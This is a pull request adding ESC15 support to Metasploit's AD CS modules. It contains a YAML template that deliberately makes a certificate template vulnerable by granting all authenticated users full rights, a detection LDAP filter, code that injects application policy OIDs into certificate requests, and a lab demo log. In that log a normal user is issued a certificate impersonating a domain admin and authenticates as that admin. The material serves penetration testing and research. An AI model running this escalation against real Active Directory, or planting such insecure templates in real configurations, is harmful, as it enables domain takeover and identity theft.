### PR TITLE
Add Support for ESC15

### DIFF
--- a/data/auxiliary/admin/ldap/ad_cs_cert_template/esc15_template.yaml
+++ b/data/auxiliary/admin/ldap/ad_cs_cert_template/esc15_template.yaml
@@ -1,0 +1,32 @@
+---
+# Creates a template that will be vulnerable to ESC15 (subject name supplied in
+# the request and schema version is 1). Fields are based on the SubCA template.
+# For field descriptions, see:
+# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (alter the EKUs via ESC15)
+- 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
+msPKI-Template-Schema-Version: 1

--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -31,6 +31,7 @@ Some useful OIDs for this purpose include:
 * `1.3.6.1.5.5.7.3.1` -- Server Authentication
 * `1.3.6.1.5.5.7.3.2` -- Client Authentication
 * `1.3.6.1.5.5.7.3.3` -- Code Signing
+* `1.3.6.1.4.1.311.20.2.1` -- Certificate Request Agent
 
 ### ALT_DNS
 Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.

--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -20,6 +20,18 @@ The target certificate authority. The default value used by AD CS is `$domain-DC
 ### CERT_TEMPLATE
 The certificate template to issue, e.g. "User".
 
+### ADD_CERT_APP_POLICY
+Add certificate application policy OIDs to the certificate. The ability to add policy OIDs to the certificate is
+dependent on it's configuration. More than one OID can be specified, separated by spaces, `;`, or `,`.
+
+Some useful OIDs for this purpose include:
+
+* `1.3.6.1.4.1.311.20.2.2` -- Smart Card Logon
+* `1.3.6.1.5.2.3.4` -- PKINIT Client Authentication
+* `1.3.6.1.5.5.7.3.1` -- Server Authentication
+* `1.3.6.1.5.5.7.3.2` -- Client Authentication
+* `1.3.6.1.5.5.7.3.3` -- Code Signing
+
 ### ALT_DNS
 Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
 

--- a/lib/msf/core/exploit/remote/ms_icpr.rb
+++ b/lib/msf/core/exploit/remote/ms_icpr.rb
@@ -22,6 +22,8 @@ module Exploit::Remote::MsIcpr
   OID_NTDS_OBJECTSID = '1.3.6.1.4.1.311.25.2.1'.freeze
   # [[MS-WCCE]: 2.2.2.7.10 szENROLLMENT_NAME_VALUE_PAIR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/92f07a54-2889-45e3-afd0-94b60daa80ec)
   OID_ENROLLMENT_NAME_VALUE_PAIR = '1.3.6.1.4.1.311.13.2.1'.freeze
+  # [[MS-WCCE]: 2.2.2.7.7.3 Encoding a Certificate Application Policy Extension](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/160b96b1-c431-457a-8eed-27c11873f378)
+  OID_APPLICATION_CERT_POLICIES = '1.3.6.1.4.1.311.21.10'.freeze
 
   class MsIcprError < StandardError; end
   class MsIcprConnectionError < MsIcprError; end
@@ -39,6 +41,7 @@ module Exploit::Remote::MsIcpr
       OptString.new('ALT_DNS', [ false, 'Alternative certificate DNS' ]),
       OptString.new('ALT_SID', [ false, 'Alternative object SID' ]),
       OptString.new('ALT_UPN', [ false, 'Alternative certificate UPN (format: USER@DOMAIN)' ]),
+      OptString.new('ADD_CERT_APP_POLICY', [ false, 'Add certificate application policy OIDs' ], regex: /^\d+(\.\d+)+(([;,]\s*|\s+)\d+(\.\d+)+)*$/),
       OptPath.new('PFX', [ false, 'Certificate to request on behalf of' ]),
       OptString.new('ON_BEHALF_OF', [ false, 'Username to request on behalf of (format: DOMAIN\\USER)' ]),
       Opt::RPORT(445)
@@ -131,6 +134,7 @@ module Exploit::Remote::MsIcpr
     alt_sid = opts[:alt_sid] || (datastore['ALT_SID'].blank? ? nil : datastore['ALT_SID'])
     alt_upn = opts[:alt_upn] || (datastore['ALT_UPN'].blank? ? nil : datastore['ALT_UPN'])
     algorithm = opts[:algorithm] || datastore['DigestAlgorithm']
+    application_policies = opts[:add_cert_app_policy] || (datastore['ADD_CERT_APP_POLICY'].blank? ? nil : datastore['ADD_CERT_APP_POLICY'].split(/[;,]\s*|\s+/))
     status_msg << " - alternate DNS: #{alt_dns}" if alt_dns
     status_msg << " - alternate UPN: #{alt_upn}" if alt_upn
     status_msg << " - digest algorithm: #{algorithm}" if algorithm
@@ -140,7 +144,8 @@ module Exploit::Remote::MsIcpr
       dns: alt_dns,
       msext_sid: alt_sid,
       msext_upn: alt_upn,
-      algorithm: algorithm
+      algorithm: algorithm,
+      application_policies: application_policies
     )
 
     on_behalf_of = opts[:on_behalf_of] || (datastore['ON_BEHALF_OF'].blank? ? nil : datastore['ON_BEHALF_OF'])
@@ -205,6 +210,13 @@ module Exploit::Remote::MsIcpr
       print_status("Certificate UPN: #{upn.join(', ')}")
     end
 
+    unless (policy_oids = get_cert_policy_oids(response[:certificate])).empty?
+      print_status("Certificate Policies:")
+      policy_oids.each do |oid|
+        print_status("  * #{oid.value}" + (oid.label.present? ? " (#{oid.label})" : ''))
+      end
+    end
+
     pkcs12 = OpenSSL::PKCS12.create('', '', private_key, response[:certificate])
     # see: https://pki-tutorial.readthedocs.io/en/latest/mime.html#mime-types
     info = "#{simple.client.default_domain}\\#{datastore['SMBUser']} Certificate"
@@ -239,8 +251,10 @@ module Exploit::Remote::MsIcpr
   # @param [String] dns An alternative DNS name to use.
   # @param [String] msext_sid An explicit SID to specify for strong identity mapping.
   # @param [String] msext_upn An alternative User Principal Name (this is a Microsoft-specific feature).
+  # @param [String] algorithm The algorithm to use when signing the CSR.
+  # @param [Array<String>] application_policies OIDs to add as application policies.
   # @return [OpenSSL::X509::Request] The request object.
-  def build_csr(cn:, private_key:, dns: nil, msext_sid: nil, msext_upn: nil, algorithm: 'SHA256')
+  def build_csr(cn:, private_key:, dns: nil, msext_sid: nil, msext_upn: nil, algorithm: 'SHA256', application_policies: [])
     request = OpenSSL::X509::Request.new
     request.version = 1
     request.subject = OpenSSL::X509::Name.new([
@@ -263,6 +277,13 @@ module Exploit::Remote::MsIcpr
         value: msext_sid
       })
       extensions << OpenSSL::X509::Extension.new(OID_NTDS_CA_SECURITY_EXT, ntds_ca_security_ext.to_der, false)
+    end
+
+    unless application_policies.blank?
+      application_cert_policies = Rex::Proto::CryptoAsn1::X509::CertificatePolicies.new(
+        certificatePolicies: application_policies.map { |policy_oid| Rex::Proto::CryptoAsn1::X509::PolicyInformation.new(policyIdentifier: policy_oid) }
+      )
+      extensions << OpenSSL::X509::Extension.new(OID_APPLICATION_CERT_POLICIES, application_cert_policies.to_der, false)
     end
 
     unless extensions.empty?
@@ -349,6 +370,22 @@ module Exploit::Remote::MsIcpr
     )
   end
 
+  # Get the certificate policy OIDs from the certificate.
+  #
+  # @param [OpenSSL::X509::Certificate] cert
+  # @return [Array<Rex::Proto::CryptoAsn1::ObjectId>] The policy OIDs if any were found.
+  def get_cert_policy_oids(cert)
+    ext = cert.extensions.find { |e| e.oid == 'ms-app-policies' }
+    return [] unless ext
+
+    cert_policies = Rex::Proto::CryptoAsn1::X509::CertificatePolicies.parse(ext.value_der)
+    cert_policies.value.map do |policy_info|
+      oid_string = policy_info[:policyIdentifier].value
+      Rex::Proto::CryptoAsn1::OIDs.value(oid_string) || Rex::Proto::CryptoAsn1::ObjectId.new(oid_string)
+    end
+  end
+
+
   # Get the object security identifier (SID) from the certificate. This is a Microsoft specific extension.
   #
   # @param [OpenSSL::X509::Certificate] cert
@@ -401,7 +438,6 @@ module Exploit::Remote::MsIcpr
       gn[:dNSName].value
     end
   end
-
 
   # Get the E-mail addresses from the certificate.
   #

--- a/lib/rex/post/ldap/ui/console/command_dispatcher/client.rb
+++ b/lib/rex/post/ldap/ui/console/command_dispatcher/client.rb
@@ -32,7 +32,8 @@ module Rex
           #
           def commands
             cmds = {
-              'query' => 'Run an LDAP query'
+              'query' => 'Run an LDAP query',
+              'getuid' => 'Get the user that the connection is running as'
             }
 
             reqs = {}
@@ -100,6 +101,12 @@ module Rex
             print_line
             print_line 'Run the query against the session.'
             print @@query_opts.usage
+          end
+
+          def cmd_getuid
+            username = client.ldapwhoami
+            username.delete_prefix!('u:')
+            print_status("Server username: #{username}")
           end
 
           private

--- a/lib/rex/proto/crypto_asn1/x509.rb
+++ b/lib/rex/proto/crypto_asn1/x509.rb
@@ -177,4 +177,25 @@ module Rex::Proto::CryptoAsn1::X509
   # https://datatracker.ietf.org/doc/html/rfc3280#section-4.2.1.7
   class SubjectAltName < GeneralNames
   end
+
+  # https://datatracker.ietf.org/doc/html/rfc3280#section-4.2.1.5
+  class PolicyQualifierInfo < RASN1::Model
+    sequence :PolicyQualifierInfo, content: [
+      objectid(:policyQualifierId),
+      any(:qualifier)
+    ]
+  end
+
+  # https://datatracker.ietf.org/doc/html/rfc3280#section-4.2.1.5
+  class PolicyInformation < RASN1::Model
+    sequence :PolicyInformation, content: [
+      objectid(:policyIdentifier),
+      sequence_of(:policyQualifiers, PolicyQualifierInfo, optional: true)
+    ]
+  end
+
+  # https://datatracker.ietf.org/doc/html/rfc3280#section-4.2.1.5
+  class CertificatePolicies < RASN1::Model
+    sequence_of(:certificatePolicies, PolicyInformation)
+  end
 end

--- a/lib/rex/proto/ldap/client.rb
+++ b/lib/rex/proto/ldap/client.rb
@@ -119,6 +119,16 @@ module Rex
           dlog("#{peerinfo} Discovered base DN: #{base_dn}")
           base_dn
         end
+
+        # Monkeypatch upstream library to support the extended Whoami request. Delete
+        # this after https://github.com/ruby-ldap/ruby-net-ldap/pull/425 is landed.
+        # This is not the only occurrence of a patch for this functionality.
+        def ldapwhoami(args = {})
+          instrument "ldapwhoami.net_ldap", args do |payload|
+            @result = use_connection(args, &:ldapwhoami)
+            @result.success? ? @result.extended_response : nil
+          end
+        end
       end
     end
   end

--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
     'displayName',
     'instanceType',
     'revision',
-    'msPKI-Template-Schema-Version',
     'msPKI-Template-Minor-Revision',
   ].freeze
 

--- a/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
+++ b/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
@@ -455,7 +455,7 @@ class MetasploitModule < Msf::Auxiliary
         next if vuln == 'ESC3_TEMPLATE_2'
 
         prefix = "#{vuln}:"
-        info = hash[:notes].select { |note| note.start_with?(prefix) }.map { |note| note.delete_prefix(prefix) }.join("\n")
+        info = hash[:notes].select { |note| note.start_with?(prefix) }.map { |note| note.delete_prefix(prefix).strip }.join("\n")
         info = nil if info.blank?
 
         report_vuln(

--- a/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
+++ b/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
@@ -45,17 +45,18 @@ class MetasploitModule < Msf::Auxiliary
           allows enrollment in and which SIDs are authorized to use that certificate server to
           perform this enrollment operation.
 
-          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, and
-          ESC13. The module is limited to checking for these techniques due to them being identifiable remotely from a
-          normal user account by analyzing the objects in LDAP.
+          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13,
+          and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from
+          a normal user account by analyzing the objects in LDAP.
         },
         'Author' => [
           'Grant Willcox', # Original module author
-          'Spencer McIntyre' # ESC13 update
+          'Spencer McIntyre' # ESC13 and ESC15 updates
         ],
         'References' => [
           [ 'URL', 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
-          [ 'URL', 'https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53' ] # ESC13
+          [ 'URL', 'https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53' ], # ESC13
+          [ 'URL', 'https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc' ] # ESC15
         ],
         'DisclosureDate' => '2021-06-17',
         'License' => MSF_LICENSE,
@@ -373,6 +374,21 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
+  def find_esc15_vuln_cert_templates
+    esc_raw_filter = '(&'\
+      '(objectclass=pkicertificatetemplate)'\
+      '(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))'\
+      '(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))'\
+      '(pkiextendedkeyusage=*)'\
+      '(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)'\
+      '(mspki-template-schema-version=1)'\
+    ')'
+    notes = [
+      'ESC15: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema-Version)'
+    ]
+    query_ldap_server_certificates(esc_raw_filter, 'ESC15', notes: notes)
+  end
+
   def find_enrollable_vuln_certificate_templates
     # For each of the vulnerable certificate templates, determine which servers
     # allows users to enroll in that certificate template and which users/groups
@@ -555,6 +571,7 @@ class MetasploitModule < Msf::Auxiliary
       find_esc2_vuln_cert_templates
       find_esc3_vuln_cert_templates
       find_esc13_vuln_cert_templates
+      find_esc15_vuln_cert_templates
 
       find_enrollable_vuln_certificate_templates
       print_vulnerable_cert_info


### PR DESCRIPTION
This adds support for ESC15 to various AD CS related modules. A template is added so the `ad_cs_cert_template` module can create and update templates to be vulnerable to ESC15 (downgrading the schema may not work and should be tested, but creating a net-new one does work). Fingerprinting is added to the `ldap_esc_vulnerable_cert_finder` module to identify templates that are vulnerable to ESC15. Finally, OIDs can be specified in the `icpr_cert` module so a vulnerable template can be exploited by a user.


## Todo
- [x] Test the issued certificate authenticates as the user who specified
- [x] Update the workflow docs for exploiting ESC15
- [x] Update the `icpr_cert` docs for the new option
- [ ] Check on and write missing tests as necessary

## Demo
Not sure why the session is showing up as from 127.0.0.1 to 127.0.0.1, but with the new ldap whoami changes, it shows that the certificate authenticated as the `MSFLAB\smcintyre` DA user and not the `MSFLAB\mhatter` normal user who issued it.
```
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.4.1.311.20.2.2;1.3.6.1.5.5.7.3.2  no        Add certificate application policy OIDs
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID                                                        no        Alternative object SID
   ALT_UPN              smcintyre@msflab.local                    no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA                              yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test                                yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: smcintyre@msflab.local - digest algorithm: SHA256 - template: ESC15-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
[*] 192.168.159.10:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
[*] The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/ldap/ldap_login) > run RHOSTS=192.168.159.10 LDAP::Auth=schannel SSL=true LDAP::CertFile=/home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx

[+] Success: 'Cert File /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx'
[*] LDAP session 2 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-09 15:35:50 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -i -1
[*] Starting interaction with 2...

LDAP (192.168.159.10) > getuid
[*] Server username: MSFLAB\smcintyre
LDAP (192.168.159.10) >
```

## Testing Steps

- [ ] Use the `ad_cs_cert_template` to create a vulnerable certificate using the new template
    - [ ] Use the same module to read the certificate template to see that the schema is 1 and that the Client Authentication EKU is missing
- [ ] Use the `ldap_esc_vulnerable_cert_finder` module to identify the new template
- [ ] Use the `icpr_cert` module to issue a certificate
    - [ ] Use the new option to specify an EKU to add of `1.3.6.1.5.5.7.3.2` (Client Authentication)
    - [ ] Use the `ALT_UPN` option to specify a privileged user
    - [ ] When the certificate is issued, see the EKU that was specified listed as a certificate policy
- [ ] Use the `ldap_login` module to authenticate using schannel to the server with the certificate
- [ ] Run the `getuid` command on the session and see that it is authenticated as the user specified in the `ALT_UPN` datastore argument when the cert was issued
